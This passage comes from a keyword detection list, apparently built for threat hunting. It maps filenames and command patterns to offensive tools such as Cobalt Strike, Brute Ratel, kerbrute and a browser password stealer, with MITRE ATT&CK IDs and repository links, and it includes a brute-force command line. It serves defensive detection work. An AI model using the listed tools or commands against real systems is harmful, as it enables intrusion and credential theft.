improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_exploit_server_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BrowserBookmarkDiscovery_BrowserHistory.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Browser-C2.git*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*Browser-C2-master.zip*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*browserexploitserver.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BrowserGhost-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*BrowserListener.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Browser-password-stealer.git*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*Browser-password-stealer-master*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,1,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*browserpivot *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*brun_script_in_mem*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*brunasadmin*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brute/Brute.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Brute/Brute.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Brute/Brute.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*brute_force_ntlm.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*bruteforce *.txt*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Brute-force Unsuccessful!*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*bruteforce.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*BruteForce.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*BruteforceCLSIDs.*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*bruteForceCombos*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*Brute-force-Instagram-*.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*bruteforce-luks -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bruteForceUser*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteForceUser*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteloader*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*brute-locadmin *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*brute-ratel-*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BruteRatel*.tar.gz*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BruteRatel*.zip*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bruteratel.com/*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bruteratel/*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brute-Ratel-C4*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brutesploit.git*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*BruteSploit/wlist/*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*brutespray*,offensive_tool_keyword,brutespray,BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.,T1110,TA0001 - TA0043,N/A,N/A,Credential Access,https://github.com/x90skysn3k/brutespray,1,1,N/A,N/A,10,1771,378,2023-03-15T23:00:29Z,2017-04-05T17:05:10Z -*BruteStager.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*BruteStager.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*bruteuser.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*bruteuserCmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*BruteX*,offensive_tool_keyword,BruteX,Automatically brute force all services running on a target. Open ports. Usernames Passwords,T1110,TA0007 - TA0008 - TA0009,N/A,N/A,Credential Access,https://github.com/1N3/BruteX,1,0,N/A,N/A,10,1713,562,2023-08-16T04:00:18Z,2015-06-01T22:28:19Z -*bshinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bshinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bshspawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bsteal_token*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bsteal_token*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 